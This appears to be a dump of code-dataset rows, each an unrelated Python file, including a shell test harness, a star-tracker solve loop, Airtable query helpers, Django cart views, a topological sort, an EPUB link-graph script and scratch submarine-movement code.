        print "Connected"
        print "Testing commands"
        s.assertCommand("ifconfig")
        o = s.filter("ls -ltr")
        #print o
        s.issueCommand("ls")
        s.assertCommand("ls","# ")
        #s.assertOutput(":~ ")
        time.sleep(2)
        s.runLong("tail -f /tmp/gltest-debug.log")
        time.sleep(2)
        s.stopLong()
        s.disconnect()
        return
    def testNoUser(self):
        "Connect with local shell"
        # Disabled via the bare return below.
        return
        pass
        s = LocalShell()
        s.assertCommand("mkdir abc")
        o = s.filter("ls -ltr abc")
        s.issueCommand("rm -r abc")
        print o
        s.disconnect()
    def testNoSshKeyUser(self):
        "Connect with local shell"
        # Disabled via the bare return below.
        return
        pass
        self.ip = '172.16.45.215'
        s = SSH(self.ip)
        s.disconnect()
    def testLocalShell(self):
        "Connect with local shell"
        # The only enabled test: spawns a local bash and filters output.
        s = LocalShell()
        print "Test Filter command:"
        print s.filter("ls -ltr")
        print "Test Filter command:"
        #s.filter("sudo /usr/sbin/asterisk -c",delim='CLI>')
        #s.filter("stop gracefully")
    #def testSSHRemote(self):
    #    self.ip = 'root@172.16.43.129'
    #    s = SSH(self.ip)
    #    s.disconnect()
    #def testSSHRemote(self):
    #    self.ip = 'root@172.16.43.109'
    #    s = SSH(self.ip)
    #    s.disconnect()
if __name__ == '__main__':
    # startLogger is defined elsewhere in this file; 'DEBUG' sets verbosity.
    startLogger ('DEBUG')
    unittest.main()
|
984,690 | f19cb3023d4602ba2791a508697a3721189cde18 | import os
from os import system
from time import sleep, time
import socket
import math
from math import sin, cos
from socket import error as socket_error
import errno
import sys
import cv2
import numpy as np
from fractions import Fraction
import startracker
import beast
import ctypes
import serial
import struct
###### when taking actual pictures, uncomment the code below #######
#import picamera
#from cam import set_camera_specs, take_picture
####################################################################
os.system("pwd")  # log the working directory for debugging
# Command-line layout: 1=image dir, 2=config file, 3=year, 4=median image,
# 5=(unused; was the stars text file), 6=mode command, 7=star count
file_path = sys.argv[1]
CONFIGFILE = sys.argv[2]
YEAR = float(sys.argv[3])
MEDIAN_IMAGE = cv2.imread(sys.argv[4])
command = sys.argv[6]
num_stars = int(sys.argv[7])
my_star_db = startracker.set_up(CONFIGFILE, YEAR)
COM_Port = serial.Serial("/dev/ttyS0", baudrate=9600, bytesize =8,parity = 'N', stopbits =1,timeout=300) #open serial port
file_type = ".bmp"
pic_num = 0
start = time()
###### when taking actual pictures, uncomment the code below #######
#camera = picamera.PiCamera()
#set_camera_specs(camera,False)
####################################################################
# counters for the solve success-rate statistics printed each frame
success_count = 0
total_count = 0
# don't need a star text file anymore
#stars_text_file = sys.argv[5] # text file name with lastest star position data (put a text file and argv in unit_test.sh for it)
stars = None # latest constellation
# Main acquisition/solve loop: one iteration per frame until "quit"
# (or a successful "lis" solve) breaks out.
while True:
    before_time = time()
    sleep(0.001)  # allows CPU to get ready for next image
    solved = False
    pic_num = pic_num + 1  # cannot read last image
    # define image name inside the loop so every frame gets its own file
    image_name = file_path + "/test" + str(pic_num) + file_type
    ###### when taking actual pictures, uncomment the code below #######
    # per-frame results file (still working on not getting the last image)
    image_text = file_path + "/test" + str(pic_num-1) + ".txt"
    text_file = open(image_text,"w+")
    before_capture_time = time()
    #take_picture(camera, image_name)
    after_capture_time = time()
    ####################################################################
    if not os.path.exists(image_name):
        # ran out of images on disk: fall through to a clean shutdown
        print("No picture")
        command = "quit"
    if command == "quit":
        # BUGFIX: message used to read "Qutting"
        print("Quitting OpenStartracker")
        break
    elif command == "track" or command == "lis":
        print("pic_num = " + str(pic_num))
        data = image_name.strip() # Remove stray whitespace
        before_process_time = time()
        my_reply = startracker.solve_image(file_path, data, pic_num, MEDIAN_IMAGE, my_star_db, stars, num_stars) # solve the image
        after_process_time = time()
        total_count += 1
        if type(my_reply) is tuple: # if the image was solved, this will be true
            new_stars = my_reply[1]
            stars = new_stars
            reply = my_reply[0]
            reply = [x.strip() for x in reply.split(';')]
            solved = True
            print("Quaternian: " + reply[0]) # print the quaternion
            q1 = float(reply[4])
            q2 = float(reply[5])
            q3 = float(reply[6])
            q4 = float(reply[7])
            # render the matched stars as "(x,y),(x,y),..."
            my_star_string = ""
            for i in range(len(new_stars)):
                # BUGFIX: was ``my_star_string is not ""`` -- an identity
                # test against a literal that only worked by CPython string
                # interning; use a real equality comparison.
                if my_star_string != "":
                    my_star_string += ","
                my_star_string+="("+str(new_stars[i][0])+","+str(new_stars[i][1])+")"
            q = "Quaternian: " + str(reply[0])
            DEC = "DEC: " + str(reply[1])
            RA = "RA: " + str(reply[2])
            ORI = "ORI: " + str(reply[3])
            DEC1 = float(reply[1])
            RA1 = float(reply[2])
            ORI1 = float(reply[3])
            text_file.write(q+"\n")
            text_file.write(DEC+"\n")
            text_file.write(RA+"\n")
            text_file.write(ORI+"\n")
            text_file.write("Stars: "+my_star_string+"\n")
            ############################ RS485 Code (disabled)
            #data = ctypes.create_string_buffer(28)
            #struct.pack_into('fffffff',data,0,q1,q2,q3,q4,DEC1,RA1,ORI1)
            #COM_Port.write(data)
            ######################################
            success_count += 1
            if command == "lis": # lost-in-space mode: one solve is enough
                # return reply[0] <- this is the quaternian found by lis mode
                break
        else:
            # if the track fails to solve an image, don't crop next image
            stars = None
            print(my_reply.strip())
        success_per = (float(success_count)/float(total_count)) * 100
        success_per = round(success_per,2)
        print("success rate: " + str(success_per))
        print("fail rate: " + str(100-success_per))
    after_time = time()
    capture_time = after_capture_time - before_capture_time
    process_time = after_process_time - before_process_time
    total_time = after_time - before_time
    text_file.write("Capture Time: "+str(capture_time)+"\n")
    text_file.write("Processing Time: "+str(process_time)+"\n")
    text_file.write("Total Time: " + str(total_time) + "\n")
    print("Capture Time: "+str(capture_time))
    print("Processing Time: "+str(process_time))
    print("Total Time: "+str(total_time)+"\n")
    text_file.close()
COM_Port.close()
|
984,691 | 5482f62d157f9d5656f09ae7dbb10243096e0ff7 | person = {
'first_name': 'Tony',
'last_name': 'Macaroni',
'age': 29
}
# Membership tests on a dict check its *keys*, not its values:
print('first_name in person?', 'first_name' in person)  # True: a key
print('Tony in person?', 'Tony' in person)  # False: 'Tony' is a value
|
984,692 | 70f13183249cf55c4c721e971e455cdd07e1e907 | import random
res_path = "/home/swante/downloads/"
test_lines = [line.strip() for line in open(res_path + "input.txt")]
random.seed(1)
def input():
    """Pop and return the next pre-loaded test line.

    Deliberately shadows the builtin so the solution code can be run
    unchanged against the file-backed test input.
    """
    global test_lines
    head, test_lines = test_lines[0], test_lines[1:]
    return head
# =======================
import sys, math, fractions
possible, impossible = "POSSIBLE", "IMPOSSIBLE"
output_test_id = 1
out_file = open(res_path + "output.txt", "w")
def case_print(s):
    """Write one result line to the output file, echo it to stdout, and
    advance the (currently unused in output) case counter."""
    global output_test_id
    line = f"{s}\n"
    out_file.write(line)
    print(s)
    output_test_id += 1
def print_flush(s):
    """Print *s* and flush stdout immediately (needed for interactive judges)."""
    sys.stdout.write(str(s) + "\n")
    sys.stdout.flush()
# ****************************
def solve_one_test_case():
    """Read one test case -- two ints on a line -- and return their sum."""
    first, second = (int(token) for token in input().split())
    return first + second
def mymain():
    """Read the case count, then solve and print every test case."""
    for _ in range(int(input())):
        case_print(solve_one_test_case())
mymain()
|
984,693 | 069aa472db40e03188d2b3a20b4723849dc2e2bf | import datetime
import logging
import os
import time
from typing import List
import dotenv
import requests
from utils import hyphenate_citizen_id
dotenv.load_dotenv()
AIRTABLE_API_KEY = os.environ.get('AIRTABLE_API_KEY')
AIRTABLE_BASE_ID = os.environ.get('AIRTABLE_BASE_ID')
AIRTABLE_TABLE_NAME = "Care%20Requests"
AIRTABLE_BASE_URL = f"https://api.airtable.com/v0/{AIRTABLE_BASE_ID}/{AIRTABLE_TABLE_NAME}"
AIRTABLE_AUTH_HEADER = {"Authorization": f"Bearer {AIRTABLE_API_KEY}"}
AIRTABLE_REQUEST_DELAY = 0.5
def build_airtable_formula_chain(formula: str, expressions: List[str]) -> str:
    """Combine *expressions* into a nested Airtable formula call.

    e.g. ``build_airtable_formula_chain('OR', ['a', 'b', 'c'])`` returns
    ``'OR(a,OR(b,c))'``.  Returns '' for an empty list and the bare
    expression for a single-element list.

    Rewritten as an iterative right fold so very long expression lists
    (batches of citizen-id clauses) cannot hit Python's recursion limit;
    the output is identical to the previous recursive form.
    """
    if not expressions:
        return ''
    chained = expressions[-1]
    for expression in reversed(expressions[:-1]):
        chained = f"{formula}({expression},{chained})"
    return chained
def build_airtable_datetime_expression(_datetime: datetime.datetime,
                                       timezone: datetime.timezone,
                                       unit_specifier: str = "ms") -> str:
    """Render an Airtable ``DATETIME_PARSE(...)`` expression for *_datetime*.

    Naive datetimes are localized to *timezone* first.  Aware/naive check per
    https://docs.python.org/3/library/datetime.html#determining-if-an-object-is-aware-or-naive

    BUGFIX: *unit_specifier* used to be ignored -- the literal ``"ms"`` was
    hard-coded into the result -- so callers passing ``unit_specifier='d'``
    silently got milliseconds.  It is now emitted as the third argument.
    """
    if _datetime.tzinfo is None or _datetime.tzinfo.utcoffset(_datetime) is None:
        _datetime = _datetime.replace(tzinfo=timezone)
    return (f"DATETIME_PARSE(\"{_datetime.strftime('%Y %m %d %H %M %S %z')}\","
            f"\"YYYY MM DD HH mm ss ZZ\",\"{unit_specifier}\")")
def get_airtable_records(params) -> List:
    """Fetch all records matching *params*, following Airtable pagination.

    *params* may be a dict or a list of (key, value) pairs (the callers use
    the list form for repeated ``fields[]`` keys).  Raises ConnectionError
    on a non-200 first response.
    """
    response = requests.get(AIRTABLE_BASE_URL, headers=AIRTABLE_AUTH_HEADER, params=params)
    if response.status_code != requests.codes.OK:
        raise ConnectionError(f'Unable to retrieve data from Airtable: Error HTTP{response.status_code}.')
    results = response.json()
    records = results.get('records', [])
    # Loop to handle multi-page query: Airtable returns an 'offset' token
    # while more pages remain.
    # BUGFIX: the original query parameters must be re-sent together with
    # the offset; previously only the offset was sent, so every page after
    # the first came back unfiltered, unsorted and with all fields.
    while results.get('offset'):
        time.sleep(AIRTABLE_REQUEST_DELAY)  # stay under Airtable's rate limit
        if isinstance(params, dict):
            page_params = {**params, 'offset': results['offset']}
        else:
            page_params = list(params) + [('offset', results['offset'])]
        response = requests.get(
            AIRTABLE_BASE_URL,
            headers=AIRTABLE_AUTH_HEADER,
            params=page_params)
        logging.warning(  # logging.warn is deprecated
            f'Executing multi-page query... ' +
            f'Currently on page {len(records) // 100}. Got {len(records)} records so far.')
        results = response.json()
        records += results['records']
    return records
def get_citizen_id_matched_airtable_records(citizen_ids: List[str]) -> List:
    """Fetch the Care Request records whose Citizen ID is in *citizen_ids*.

    IDs are queried in batches of 100, de-duplicated, and hyphenated via
    hyphenate_citizen_id() to match the stored format.  Results are sorted
    by Request Datetime ascending and restricted to FINISHED requests.
    """
    RECORDS_PER_REQUEST = 100
    matched_records = []
    for i in range(0, len(citizen_ids), RECORDS_PER_REQUEST):
        # OR(...) chain matching any of this batch's (hyphenated) IDs
        citizen_id_filter_str = build_airtable_formula_chain('OR', list(set(
            map(lambda citizen_id: f"{{Citizen ID}}=\"{hyphenate_citizen_id(citizen_id)}\"",
                citizen_ids[i:i + RECORDS_PER_REQUEST]))))
        # "now" in UTC+7, rendered as an Airtable DATETIME_PARSE expression
        datetime_expression = build_airtable_datetime_expression(datetime.datetime.now().astimezone(
            datetime.timezone(datetime.timedelta(hours=7))),
            datetime.timezone(datetime.timedelta(hours=7)), unit_specifier='d')
        params = [
            ('fields[]', 'Citizen ID'),
            ('fields[]', 'Care Status'),
            ('fields[]', 'Care Provider Name'),
            ('fields[]', 'Note'),
            ('filterByFormula', build_airtable_formula_chain('AND', [
                citizen_id_filter_str,
                # Rejecting to update requests older than 21 days
                # NOTE(review): DATETIME_DIFF is called here without an
                # explicit unit argument -- confirm its default gives the
                # day granularity the comment above implies.
                f"DATETIME_DIFF({datetime_expression}," +
                '{Request Datetime}) > 21',
                '{Status}="FINISHED"'
            ])),
            ('sort[0][field]', 'Request Datetime'),
            ('sort[0][direction]', 'asc'),
        ]
        records = get_airtable_records(params=params)
        matched_records += records
    return matched_records
|
984,694 | 97e7a7b64415a382384e01e61eb2add5b94dedf0 | from django.shortcuts import render
from django.shortcuts import get_object_or_404
from catalog.models import Product
from .cart import Cart
from django.http import HttpResponse
import json
def cart_add(request):
    """AJAX view: add the product given by ``?product_id=`` to the session cart.

    Always returns an ``application/json`` response with keys
    ``added`` (bool) and ``message`` (user-facing, Ukrainian).
    NOTE(review): ``Product.objects.get`` outside the try raises
    DoesNotExist (HTTP 500) for unknown ids; cart_remove uses
    get_object_or_404 instead -- left unchanged to preserve status codes.
    """
    cart = Cart(request)
    product_id = request.GET.get('product_id', None)
    product = Product.objects.get(id=product_id)
    response_data = {}
    try:
        cart.add(product=product)
        response_data['added'] = True
        response_data['message'] = 'Товар успішно додано в корзину'
    except Exception:
        # was a bare ``except:`` -- narrowed so KeyboardInterrupt/SystemExit
        # are not swallowed; adding stays deliberately best-effort.
        response_data['added'] = False
        response_data['message'] = "Помилка. Не вдалося додати до кошику."
    return HttpResponse(json.dumps(response_data), content_type="application/json")
def cart_remove(request):
    """AJAX view: remove the product given by ``?product_id=`` from the cart.

    Responds with JSON ``{"deleted": bool}``; unknown product ids yield
    HTTP 404 via get_object_or_404 (unchanged behaviour).
    """
    product_id = request.GET.get('product_id', None)
    cart = Cart(request)
    product = get_object_or_404(Product, id=product_id)
    response_data = {}
    try:
        cart.remove(product)
        response_data['deleted'] = True
    except Exception:
        # was a bare ``except:`` -- narrowed so system-exiting exceptions
        # propagate; removal stays best-effort.
        response_data['deleted'] = False
    return HttpResponse(json.dumps(response_data), content_type="application/json")
def cart_change_quantity(request):
    """AJAX view: set the cart quantity of the ``?product_id=`` product to
    the ``?quantity=`` value.

    Responds with JSON ``{"changed": bool}``.  A missing or falsy quantity
    is reported as "not changed".
    """
    cart = Cart(request)
    product_id = request.GET.get('product_id', None)
    product = Product.objects.get(id=product_id)
    response_data = {}
    if request.GET.get('quantity'):
        quantity = request.GET.get('quantity')
        # NOTE(review): quantity is passed through as a *string*; confirm
        # Cart.set_quantity converts/validates it.
        try:
            cart.set_quantity(product=product, quantity=quantity)
            response_data['changed'] = True
        except Exception:
            # was a bare ``except:`` -- narrowed so system-exiting
            # exceptions are not swallowed.
            response_data['changed'] = False
    else:
        response_data['changed'] = False
    return HttpResponse(json.dumps(response_data), content_type="application/json")
|
984,695 | 2692ad6e5904438d7e6048e383ed2158f15fdff5 | from pprint import pprint
import json
projects_map = {}
class Project:
    """Node in the project-dependency graph.

    ``neighbours`` lists the projects that depend on this one (outgoing
    edges); ``dependencies`` counts the incoming edges not yet satisfied.
    """

    def __init__(self, val):
        self.val = val
        self.neighbours = []
        self.dependencies = 0

    def add_dependency(self, project):
        """Record that *project* depends on self (edge self -> project)."""
        self.neighbours.append(project)
        project.increaseDependencies()

    def increaseDependencies(self):
        self.dependencies += 1

    def decrementDependencies(self):
        self.dependencies -= 1

    def __repr__(self):
        # JSON keeps the debug output copy/paste friendly; neighbours are
        # omitted to avoid recursing through the graph.
        return json.dumps({
            'root': self.val,
            'dependencies': self.dependencies
        })

    # __str__ previously duplicated __repr__'s body verbatim; delegate instead.
    __str__ = __repr__
def addNonDependent(order, offset, projects):
    """Append every zero-dependency project in *projects* to *order*.

    Writes into the pre-sized *order* list starting at slot *offset* and
    returns the updated ``(offset, order)`` pair.
    """
    for candidate in projects:
        if candidate.dependencies != 0:
            continue
        order[offset] = candidate
        offset += 1
    return offset, order
def build_project(projects):
    """Topologically sort *projects* (Kahn's algorithm).

    Two cursors walk one pre-sized list: ``end`` marks where the next
    buildable project is written, ``to_be_processed`` marks the next
    project whose outgoing edges get released.

    Prints the computed order (as before) and returns it as a list, or
    None when a cycle makes a complete order impossible.
    BUGFIX: the function used to return None on success as well, so
    callers could not distinguish success from a cycle.
    """
    order = [None] * len(projects)
    end = 0
    to_be_processed = 0
    end, order = addNonDependent(order, end, projects)
    while to_be_processed < end:
        current_project = order[to_be_processed]
        if current_project is None:
            return None
        neighbours = current_project.neighbours
        for neighbour in neighbours:
            # one incoming edge satisfied; newly-free projects are queued
            neighbour.decrementDependencies()
        end, order = addNonDependent(order, end, neighbours)
        to_be_processed += 1
    print(order)
    # a partially-filled order means some projects never became free (cycle)
    return order if end == len(order) else None
def get_or_create_project(project_name):
    """Return the cached Project for *project_name*, creating it on first use."""
    project = projects_map.get(project_name)
    if project is None:
        project = Project(project_name)
        projects_map[project_name] = project
    return project
def main(projects, dependencies):
    """Build the dependency graph from an edge list, then print a build order.

    Arguments:
        projects     -- iterable of project names (graph nodes)
        dependencies -- iterable of (from, to) pairs: *from* must be built
                        before *to* (add_dependency increments *to*'s
                        incoming-edge count)
    """
    for p in projects:
        get_or_create_project(p)
    for dependency in dependencies:
        from_node = get_or_create_project(dependency[0])
        to_node = get_or_create_project(dependency[1])
        from_node.add_dependency(to_node)
    # dump the graph, then compute/print a topological order
    pprint(projects_map)
    build_project(projects_map.values())
# Sample graph: each pair (x, y) means x must be built before y.
nodes = ['a', 'b', 'c', 'd', 'e', 'f']
dependencies = [('a', 'd'), ('f', 'b'), ('b', 'd'), ('f', 'a'), ('d', 'c')]
# idea is to build the projects which do not have any incoming dependencies.
# After building the projects mark the incoming nodes as null on the dependent projects
if __name__ == '__main__':
    main(nodes, dependencies)
|
984,696 | f6d473411fd4f9f6cf638c20b193478dbeb8564e | # Generated by Django 2.2.6 on 2019-10-28 14:15
from django.db import migrations
class Migration(migrations.Migration):
    # Auto-generated schema migration: drops the ``gym_name`` field from
    # the ``sportsman`` model.  Avoid hand-editing generated migrations.

    dependencies = [
        ('sport', '0002_auto_20191028_1414'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='sportsman',
            name='gym_name',
        ),
    ]
984,697 | cdfca714634519f51b9a6bc4fcd64035829f6954 | from .decode import decode
from .splice import Splice
from .stream import Stream
|
984,698 | cbb58be457aae937cb2af13dbd85694e1d166389 | #!/usr/bin/python
"""
Print the directed network graph for a given EPUB ebook.
The output, printed to stdout, is in graphviz (dot) format.
The nodes are the spine items, identified by their manifest id.
The black arcs are direct links between content documents,
the red arcs show the spine progression.
"""
# standard modules
import bs4
import os
import sys
# yael modules
# TODO find a better way to do this
PROJECT_DIRECTORY = os.path.dirname(
os.path.dirname(os.path.dirname(os.path.realpath(sys.argv[0]))))
sys.path.append(PROJECT_DIRECTORY)
from yael import Parsing
from yael import Publication
import yael.util
__author__ = "Alberto Pettarin"
__copyright__ = "Copyright 2015, Alberto Pettarin (www.albertopettarin.it)"
__license__ = "MIT"
__version__ = "0.0.9"
__email__ = "alberto@albertopettarin.it"
__status__ = "Development"
def usage():
    """Print command-line usage for this script on stdout."""
    prog = sys.argv[0]
    print("")
    print("$ ./%s path/to/dir [--no-spine] > path/to/out.gv" % prog)
    print("$ ./%s path/to/file.epub [--no-spine] > path/to/out.gv" % prog)
    print("")
def main():
    """Parse the EPUB named on the command line and print its link graph
    as a Graphviz (dot) digraph on stdout.

    Nodes are spine items (manifest ids); black arcs are direct <a> links
    between content documents, red arcs show the spine progression
    (suppressed with --no-spine).
    """
    if len(sys.argv) > 1:
        # read from file.epub or uncompressed dir;
        # parsing media overlays is not necessary for the link graph
        ebook = Publication(
            path=sys.argv[1],
            parsing_options=[Parsing.NO_MEDIA_OVERLAY])
    else:
        # no arguments => print usage
        usage()
        return
    # shall we add the arcs showing the spine progression?
    add_spine = True
    if (len(sys.argv) > 2) and (sys.argv[2] == "--no-spine"):
        add_spine = False
    # arc accumulator: [source id, target id, kind]
    arcs = []
    # shortcuts
    pac_document = ebook.container.default_rendition.pac_document
    manifest = pac_document.manifest
    spine = pac_document.spine.itemrefs
    # for each item in the spine...
    for itemref in spine:
        item = manifest.item_by_id(itemref.v_idref)
        if item is not None:  # was "!= None"
            i_p_item = item.asset.internal_path
            try:
                # ...read the item contents and try to load it
                # as a tag soup using BeautifulSoup...
                soup = bs4.BeautifulSoup(item.contents)
                # ... finding all the <a> elements...
                for link in soup.find_all('a'):
                    # ... that have an href attribute (internal links only)
                    target_href = link.get('href')
                    if (
                            (target_href is not None) and
                            (not target_href.startswith("http"))):
                        # get the internal path of the target file,
                        # removing the #fragment, if any
                        i_p_target = yael.util.norm_join_parent(
                            i_p_item,
                            target_href.split("#")[0])
                        # get the manifest id of the target file
                        target = manifest.item_by_internal_path(i_p_target)
                        if target is not None:
                            arcs.append([item.v_id, target.v_id, "link"])
            except Exception:
                # was a bare ``except:``; parsing is still deliberately
                # best-effort (skip items that cannot be souped), but we
                # no longer swallow KeyboardInterrupt/SystemExit.
                pass
    if add_spine:
        # red arcs: consecutive spine items
        for i in range(len(spine)):
            if i+1 < len(spine):
                item = pac_document.manifest.item_by_id(spine[i].v_idref)
                target = pac_document.manifest.item_by_id(spine[i+1].v_idref)
                arcs.append([item.v_id, target.v_id, "spine"])
    # output to stdout in Graphviz (dot) format;
    # use shell redirection to save to file
    # TODO one might want to output a similar graph
    # showing referenced assets (images, audio, etc.),
    # not just <a> links
    # TODO mark linear="no" nodes with a special symbol
    # TODO remove/compact/weight duplicate arcs
    print("digraph book {")
    for arc in arcs:
        if arc[2] == "link":
            color = ""
        else:
            color = " [color=red]"
        print('"%s" -> "%s"%s;' % (arc[0], arc[1], color))
    print("}")
# Script entry point.
if __name__ == '__main__':
    main()
|
984,699 | 46c71974aaf549d8119b61ae9d3e973f6ab95ecb | # Criar objeto do submarino com atributos de posição:
# Criar movimentos
# Se movimento for igual a 'R', então some 1 ao x
# movimento = input
# movimento dividir por letras
# loop for letras com as funicções de movimento
#Class submarine, with position parameters
class Submarino:
    """Submarine with a 3-D position (x, y, z) and a compass heading.

    BUGFIX: the constructor used to overwrite its own arguments with the
    hard-coded start pose (0, 0, 0, 'NORTE'), silently ignoring whatever
    the caller passed.  The start pose is now expressed as default values,
    so ``Submarino()`` behaves exactly as before while explicit arguments
    are honoured.
    """
    def __init__(self, x=0, y=0, z=0, direction='NORTE'):
        # coerce to the types the rest of the script expects
        self.x = int(x)
        self.y = int(y)
        self.z = int(z)
        self.direction = str(direction)
command = 'LLMLRMMUMUD'
direction_list = ['NORTE','LESTE','SUL','OESTE']
def getPrevNext(l, no):
    """Return a one-element list with the item before *no* in *l*.

    Index -1 wraps, so the predecessor of the first element is the last.
    """
    return [l[l.index(no) - 1]]
print(getPrevNext(direction_list, 'NORTE'))
direction_list = ['NORTE','LESTE','SUL','OESTE']
def get_previous_direction(direction_list, current_direction_position):
    """Return [previous heading] relative to the current one (index -1 wraps)."""
    position = direction_list.index(current_direction_position)
    return [direction_list[position - 1]]
def get_next_direction(direction_list, current_direction_position):
i = direction_list.index(current_direction_position)
return[direction_list[(i + 1) % len(direction_list)]]
print (get_next_direction(direction_list, 'NORTE'))
# Receive command and split it into a list
def command_func():
    """Prompt for a submarine command string; return it as a list of chars."""
    command = input('Insira o comando para o submarino: ')
    return list(command)

# Fix: the original called command_func() twice (double prompt, first result
# discarded), had a no-op bare `command` expression, and then crashed with
# NameError on a module-level split(command) call — split() was local to
# command_func.
command = command_func()
# Print Submarine class initial position
# NOTE(review): vars() result is discarded here — only useful in a REPL/notebook.
vars(Submarino())
# Print first submarine initial position
submarino = Submarino()
print(f'Posição inicial do submarino: {submarino.x} {submarino.y} {submarino.z} {submarino.direction}')
#############################################
#############################################
class DecoratorExample:
    """Small demo class used to illustrate instance methods."""

    def __init__(self):
        """Announce construction and set the instance's name attribute."""
        print('Hello, World!')
        self.name = 'Decorator_Example'

    def example_function(self):
        """Demonstrate that an instance method can read `self`."""
        print("I'm an instance method!")
        print('My name is ' + self.name)


de = DecoratorExample()
de.example_function()
# def moviment():
# x_mov = x + x_mov
# x_mov = x + x_mov
# x_mov = x + x_mov
# direction_mov =
# x = 1
#############################################
# Split command string into chars in a list
def split(command):
    """Return the characters of *command* as a list."""
    return [char for char in command]

def movimento(command, x=0):
    """Walk the chars of *command*: each 'R' increments and prints x,
    anything else prints 'no move'.  Returns the final x.

    Fix: the original did `x = x + 1` with x never initialised, raising
    UnboundLocalError on the first 'R'; x is now a parameter (default 0).
    """
    for step in split(command):
        if step == 'R':
            x = x + 1
            print(x)
        else:
            print('no move')
    return x

command = 'rsa'
print(split(command))
command = split(command)
# Fix: the original loop used the undefined name `i` and was missing the
# colon and body after `if i == 'r'` (a SyntaxError).  Lowercase commands
# are deliberately still ignored.
for char in command:
    if char == 'r':
        pass
#############################################
def split(command):
    """Return the characters of *command* as a list."""
    return [char for char in command]

command = input()
command = split(command)
print(split(command))

# Fix: renamed `list` -> `moves`; the original shadowed the built-in list().
moves = ['L', 'R', 'R']
x = 1
# Fix: the original unpacked four values into three names (ValueError) and
# referenced y, z and d_mov before they existed (NameError).  Assign first,
# then coerce the types.
x, y, z, d_mov = 1, 2, 3, 'NORTE'
x, y, z, d_mov = int(x), int(y), int(z), str(d_mov)
#############################################
def get_direction(Submarino):
    """Demo: print the compass points on either side of 'NORTE'.

    NOTE(review): the Submarino parameter is never used and the module-level
    direction_list is read instead — this looks like scratch code; confirm
    the intended argument before relying on it.
    """
    def previous(direction_list, current_direction_position):
        pos = direction_list.index(current_direction_position)
        return [direction_list[pos - 1]]

    print(previous(direction_list, 'NORTE'))

    def next(direction_list, current_direction_position):
        pos = direction_list.index(current_direction_position)
        return [direction_list[(pos + 1) % len(direction_list)]]

    print(next(direction_list, 'NORTE'))
#########################################################################
def direction_mov_condition(direction): # Essa função retorna o valor correspondente a direção do submarino
    """Normalize an arbitrary integer heading to the cyclic range 1..4.

    ## 1 = NORTE
    ## 2 = LESTE
    ## 3 = SUL
    ## 4 = OESTE

    Values wrap around in both directions: 5 -> 1, 0 -> 4, -1 -> 3, 100 -> 4.

    Fixes over the original: values in 5..99 were returned unchanged, and
    positive multiples of 100 (e.g. 100 -> 0) escaped the 1..4 range, because
    the code sliced the last decimal digits as strings and then looped
    subtracting/adding 4.  Since n mod 4 depends only on the last two decimal
    digits anyway, plain modular arithmetic gives the same intended result in
    one step (Python's % is non-negative for a positive modulus, so negative
    inputs wrap correctly too).
    """
    return (int(direction) - 1) % 4 + 1
def test_direction_mov_condition():
    """Print the normalized heading for a spread of sample inputs."""
    samples = [1, 4, 10, 20, 99, 100, 123456789123456784, 0, -1, -10, -100, -12945678945614]
    for value in samples:
        print(direction_mov_condition(value))

test_direction_mov_condition()
import time

def test_direction_mov_condition_with_range():
    """Time direction_mov_condition over -10..9 and flag out-of-range results."""
    init_time = time.perf_counter()
    for value in range(-10, 10):
        result = direction_mov_condition(value)
        if result > 4:
            print(f'Error! Out of range, {result}')
        else:
            print(result)
    final_time = time.perf_counter()
    print(f'execution time of this test = {final_time-init_time}')

test_direction_mov_condition_with_range()
#########################################################################
# Valid commands
valid_commands = ['L','R','U','D','M']
commands = ['l','q']
# Fix: the original `for valid_command, command in valid_commands, commands:`
# iterated over the tuple of the two lists and tried to unpack a 5-element
# list into two names (ValueError).  Check each received command for
# membership in the valid set instead.
for command in commands:
    if command not in valid_commands:
        print('Please, input a valid command')
        # command = input_command_string_parser()
# Fix: the original used forward slashes instead of backslashes to escape
# the quotes around L, which was a SyntaxError.
print('Please, input a valid command \'L\' ')
def menu():
    """Interactive console menu for driving the submarine.

    Prompts for an option number (as a string) and dispatches on it,
    recursing back into menu() after options 1 and 4.

    NOTE(review): create_submarine(), send_command() and
    Submarino().get_current_position() are not defined anywhere in this
    chunk — presumably they live elsewhere (or are still to be written);
    confirm before calling.
    """
    # 1. Create Submarine
    # 2. Print initial position
    # 3. Send a command
    # 4. Print actual position
    # 5. Reset submarine position
    command_menu = input('''Choose an option and enter the number:
1. Create Submarine
2. Print current position
3. Send a command
4. Reset submarine position
''')
    # if command_menu == 1:
    #     submarine = Submarino()
    #     print('Submarine succefuly created!')
    #     menu()
    if command_menu == '1':
        # Create a fresh submarine, then show the menu again.
        sub1 = create_submarine()
        menu()
    elif command_menu == '2':
        # NOTE(review): this returns a tuple (position, result-of-menu()),
        # and the recursive menu() call runs before this function returns.
        return Submarino().get_current_position(), menu()
    elif command_menu == '3':
        command = input('Send a command: ')
        command = send_command(command)
        return command
    elif command_menu == '4':
        # Labelled "Reset" but performs the same action as option 1.
        sub1 = create_submarine()
        menu()
    else:
        print('Can\'t find this option, please follow next instructions')
        pass
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.